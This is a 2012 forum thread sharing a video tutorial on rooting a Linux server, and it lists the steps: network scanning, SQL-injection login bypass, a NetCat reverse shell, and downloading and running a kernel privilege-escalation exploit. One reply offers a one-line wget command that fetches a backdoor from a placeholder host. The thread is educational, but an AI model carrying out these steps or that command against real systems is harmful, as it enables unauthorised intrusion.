[VIDEO] Rooting A Box (local Command Execution) by Slyr0x: 8:50am On Aug 31, 2012 |
In this session, we will be having a look at gaining root privileges using command execution. Basically, we'll be seeing how a "simple" SQL Injection can lead to an attacker completely compromising your server.

https://www.youtube.com/watch?v=2_tfyF_7KWk

Steps
* Discover network for hosts (Netdiscover)
* Scan target network (Nmap)
* Bypass login screen (MySQL Injection)
* Set NetCat to listen on attack machine
* Inject bash reverse shell.
* Navigate to directory where apache user can write files (cd /tmp)
* Search for Local privilege escalation exploit for Linux kernel version 2.6
* Download exploit code and host it on attack machine
* Use reverse shell to wget exploit code to Victim’s machine
* Compile exploit code and Execute.
* Game Over

Blog Post here: http://rotimiakinyele.com/posts/rooting-a-box-local-command-execution.jsp
Re: [VIDEO] Rooting A Box (local Command Execution) by Nobody: 10:35am On Aug 31, 2012 |
That's very rare in the real world, pass in user-submitted parameters directly to the shell? You could just "wget http://someserver.com/backdoor.php" on very first login and save yourself some stress.

Nice tut.
Re: [VIDEO] Rooting A Box (local Command Execution) by Slyr0x: 11:15am On Sep 03, 2012 |
webdezzi: That's very rare in the real world, pass in user-submitted parameters directly to the shell?

You'd be surprised that Local command execution still exists in the real world. Recently, this vuln was discovered in Boxee (a cross-platform freeware Home Theater PC software application). You can watch the exploitation vid here: https://www.youtube.com/watch?v=-_wZiFmrwsw

Thanks for dropping by.